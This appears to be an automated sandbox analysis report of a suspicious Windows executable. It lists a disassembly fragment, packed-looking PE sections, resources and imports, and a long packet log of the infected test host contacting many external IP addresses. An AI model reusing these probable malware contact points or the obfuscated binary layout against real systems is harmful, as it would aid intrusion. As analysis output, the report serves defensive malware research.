                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            push 00000009h
                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            mov edi, 00051EB5h
                                                                                                                                                                                                            mov eax, edi
                                                                                                                                                                                                            add eax, 003BD29Bh
                                                                                                                                                                                                            push dword ptr [eax]
                                                                                                                                                                                                            pop dword ptr [00422F27h]
                                                                                                                                                                                                            mov eax, dword ptr [00422F27h]
                                                                                                                                                                                                            call eax
                                                                                                                                                                                                            mov dword ptr [004221ECh], eax
                                                                                                                                                                                                            or eax, eax
                                                                                                                                                                                                            jne 00007EFC89066A66h
                                                                                                                                                                                                            xor esi, ebx
                                                                                                                                                                                                            not edi
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
                                                                                                                                                                                                            int3
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf1ec | 0xf0 | .yP
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6f000 | 0x2a71c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9a000 | 0x3ba | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x26560 | 0x1c | .dOh
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2db1 | 0x2e00 | 74456d39166ecac457e6dea38fa67e5f | False | 0.7233355978260869 | data | 6.451682628905373 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.lm | 0x4000 | 0x8ea1 | 0x400 | 7dc74d85c1bcb78c5d3bf3744c32f97d | False | 0.56640625 | data | 4.511827161769864 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.qaQL | 0xd000 | 0x14d3 | 0x800 | 8d319dd5569018475a7d09327334d337 | False | 0.50341796875 | data | 4.277994011050908 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yP | 0xf000 | 0xa32b | 0xe00 | 3ebc7447b097f60f5f6db29a207e0b9c | False | 0.447265625 | data | 4.8856060140207935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bPUeWG | 0x1a000 | 0x5288 | 0x800 | 622e75bbcc0f3dd52d45ecc2a8fe2c27 | False | 0.31787109375 | data | 2.7096084234826296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.PaB | 0x20000 | 0x1689 | 0x400 | 5aaaa7158977a53a0f20c60022053586 | False | 0.7236328125 | DOS executable (COM) | 5.879612078165343 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x22000 | 0x3825 | 0x3a00 | cf82c6486f460a4514551f47469fcf83 | False | 0.8353313577586207 | data | 6.886094570732322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dOh | 0x26000 | 0x1a99 | 0x600 | 2fcbed65c7944d22457ae7a256fadfc6 | False | 0.55859375 | data | 4.5653842277254215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.HvNW | 0x28000 | 0xae24 | 0x400 | 0a43411ee9f7a05269be6512db445db4 | False | 0.5751953125 | data | 4.636971913033864 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pPJb | 0x33000 | 0x78cc | 0x200 | 4868d519f5124537f7860f6bf14d9e1c | False | 0.59765625 | data | 4.116478928954285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bBut | 0x3b000 | 0x33d12 | 0x200 | c11b151241704863c692ff2c4a6d7bfb | False | 0.52734375 | data | 3.8766512381055493 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6f000 | 0x2a71c | 0x2a800 | 9fc436bda1080dd296dc0e610445b944 | False | 0.9808421415441176 | data | 7.974880870915716 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9a000 | 0x3ba | 0x400 | cdc883ee0009ab46b2a3d9904a3b9078 | False | 0.8798828125 | data | 6.522606813860574 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6f2f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4195590994371482
RT_MENU | 0x703a0 | 0x90 | data | English | United States | 0.7430555555555556
RT_MENU | 0x70430 | 0x42 | data | English | United States | 0.9545454545454546
RT_MENU | 0x70474 | 0x96 | Matlab v4 mat-file (little endian) P, numeric, rows 72, columns 6422648, imaginary | English | United States | 0.7666666666666667
RT_MENU | 0x7050c | 0x46 | data | English | United States | 0.9285714285714286
RT_DIALOG | 0x70554 | 0x5c | data | English | United States | 0.9239130434782609
RT_STRING | 0x705b0 | 0x100 | data | English | United States | 0.7265625
RT_STRING | 0x706b0 | 0x13e | data | English | United States | 0.720125786163522
RT_STRING | 0x707f0 | 0x128 | data | English | United States | 0.722972972972973
RT_RCDATA | 0x70918 | 0x28b94 | data | English | United States | 1.0003656986643006
RT_GROUP_ICON | 0x994ac | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x994c0 | 0x25c | data | English | United States | 0.5248344370860927
DLL | Import
KERNEL32.DLL | GetACP, SetComputerNameA, GlobalFindAtomW, Beep, IsBadReadPtr, BeginUpdateResourceW, WaitForSingleObject, lstrcpyA, GetLogicalDrives, GetProcAddress, SetCurrentDirectoryW, FindResourceW, FileTimeToLocalFileTime, GetFileTime, GetThreadLocale, MulDiv, EnumTimeFormatsW, ExpandEnvironmentStringsA, CreateNamedPipeA, GetVolumeInformationA, GetSystemTime, GetLastError, GetProcessHeap, GetWindowsDirectoryW, GetStartupInfoW, GetSystemInfo, ExitProcess, GetTempFileNameA, GetVolumeInformationW, CreateSemaphoreA, SetCalendarInfoW, lstrcmpA, lstrcmpiA, CreateFileA, GetUserDefaultLangID, GlobalAlloc, GetModuleHandleA, GetDateFormatW, SleepEx
user32.dll | wvsprintfW, GetDesktopWindow, CopyImage, GetMenuInfo, LoadMenuW, SetWindowRgn, MessageBoxIndirectW, PostMessageA, GetActiveWindow, GetWindowRect, SetWindowPos, MonitorFromPoint, CreateDialogParamA, SetDlgItemInt, WinHelpA, GetSystemMetrics, GetDC, SetWindowLongA, GetSysColorBrush, InsertMenuA, DrawTextA, EnumDesktopWindows, InsertMenuItemW, GetWindowRgn, LoadMenuA, OpenClipboard, IsChild, EnableMenuItem, LoadMenuIndirectW, ShowCaret, SetCursorPos, MessageBeep, EnumWindows, GetClientRect, CreateDialogParamW, InsertMenuW
gdi32.dll | CreateFontIndirectA, ResizePalette, PolyBezier, SaveDC, ScaleWindowExtEx, CloseEnhMetaFile, SetBoundsRect, SetViewportExtEx
advapi32.dll | RegCreateKeyExW, RegQueryInfoKeyW, RegCreateKeyExW, RegRestoreKeyW
COMDLG32.DLL | GetOpenFileNameW, ChooseFontA, GetFileTitleW, PrintDlgExW, PrintDlgW
SETUPAPI.DLL | SetupDiSetDeviceInstallParamsA, SetupGetLineTextA, SetupQueueCopyW, SetupDiEnumDeviceInfo, pSetupVerifyCatalogFile, CM_Get_Device_Interface_List_SizeA
VERSION.DLL | VerInstallFileA, VerLanguageNameW, VerFindFileA
urlmon.dll | RegisterMediaTypes, GetClassURL
WINMM.DLL | waveOutGetPlaybackRate, timeKillEvent
WINSPOOL.DRV | GetFormA
INETCOMM.DLL | HrAttachDataFromFile, MimeGetAddressFormatW, MimeOleGetCodePageInfo, MimeOleStripHeaders, HrGetLastOpenFileDirectoryW, MimeOleCreateSecurity
Language of compilation system | Country where language is spoken | Map
English | United States |
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.286231995 CEST805532344.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.286293030 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.286434889 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.291306019 CEST805532344.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.292587996 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.297631979 CEST805532418.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.297693968 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.297926903 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.298744917 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.302659988 CEST805532418.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.303570986 CEST805532544.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.303623915 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.305692911 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.310539961 CEST805532544.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.315977097 CEST5532680192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.319499016 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.320796013 CEST8055326199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.320868969 CEST5532680192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.320972919 CEST5532680192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.324326992 CEST80553273.94.10.34192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.324397087 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.324522972 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.325799942 CEST8055326199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.329314947 CEST80553273.94.10.34192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.510967016 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515906096 CEST805532869.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515964985 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.521517038 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.526364088 CEST805532869.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.540250063 CEST5532980192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.545200109 CEST8055329154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.545269012 CEST5532980192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.545397043 CEST5532980192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.550164938 CEST8055329154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.593875885 CEST5533080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.596396923 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.596451044 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.598680019 CEST80553303.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.598736048 CEST5533080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.598859072 CEST5533080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.600321054 CEST805532123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.600353956 CEST805532123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.600383043 CEST5532180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.600419044 CEST5532180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.601347923 CEST5532180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.601366997 CEST5532180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.603667021 CEST80553303.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.604758024 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.605113029 CEST5533180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.609608889 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.609915972 CEST805533123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.609978914 CEST5533180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.610352993 CEST5533180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.615206957 CEST805533123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.724021912 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.724092960 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.770370007 CEST805532544.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.770407915 CEST805532544.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.770436049 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.770466089 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.773612976 CEST805532344.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.773660898 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.773720980 CEST805532344.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.773761988 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.775734901 CEST5532580192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.776025057 CEST5532380192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.781717062 CEST805532544.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.782196999 CEST805532344.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.791286945 CEST805532418.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.791304111 CEST805532418.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.791357994 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.791399002 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.792171955 CEST80553273.94.10.34192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.792231083 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.792609930 CEST80553273.94.10.34192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.792668104 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.795141935 CEST5532780192.168.2.43.94.10.34
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.797919989 CEST5532480192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.800868034 CEST80553273.94.10.34192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.804013014 CEST805532418.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.816704988 CEST8049732188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.816788912 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.831883907 CEST55332443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.831929922 CEST44355332188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.831990004 CEST55332443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.844716072 CEST55332443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.844727993 CEST44355332188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.047544003 CEST805532869.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.047602892 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.048312902 CEST805532869.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.048361063 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.055144072 CEST5532880192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.060132980 CEST805532869.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.103749037 CEST805533123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.103765011 CEST805533123.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.103799105 CEST5533180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.103832960 CEST5533180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.104244947 CEST5533180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.104274988 CEST5533180192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.340302944 CEST44355332188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.340596914 CEST55332443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.391727924 CEST55332443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.391752958 CEST44355332188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.366925001 CEST805535713.248.169.48192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.366981983 CEST5535780192.168.2.413.248.169.48
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.611385107 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617265940 CEST805535818.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617330074 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617372036 CEST805535818.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617381096 CEST5535880192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617404938 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617434025 CEST5535880192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.617624998 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.623533964 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.624835968 CEST5535880192.168.2.418.208.156.248
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.629730940 CEST805535818.208.156.248192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.639673948 CEST8055356188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.639730930 CEST5535680192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.649379015 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.649418116 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.649533033 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.649804115 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:29.649818897 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.156188965 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.156260014 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.192733049 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.192771912 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.193344116 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.193411112 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.211007118 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.256498098 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.540987968 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.541058064 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.554078102 CEST553628001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.559009075 CEST80015536247.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.559077978 CEST553628001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.559263945 CEST553628001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.564023018 CEST80015536247.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941648006 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941692114 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941724062 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941725016 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941742897 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941759109 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941780090 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941854954 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941906929 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941936970 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941975117 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941986084 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.941992044 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.942056894 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.942061901 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.942152977 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.942198992 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.942204952 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.942308903 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.942969084 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.943007946 CEST44355360188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.943016052 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.943069935 CEST55360443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.944328070 CEST5535680192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:30.950896025 CEST8055356188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.313548088 CEST8055356188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.313725948 CEST5535680192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.418941975 CEST8055356188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.419013977 CEST5535680192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.424981117 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.425035000 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.425098896 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.425468922 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.425481081 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.878287077 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.878364086 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880526066 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880536079 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880769014 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880814075 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.881213903 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.924500942 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685209036 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685247898 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685281038 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685286045 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685303926 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685313940 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685313940 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685359001 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685373068 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685446024 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685606956 CEST44355363188.114.96.3192.168.2.4
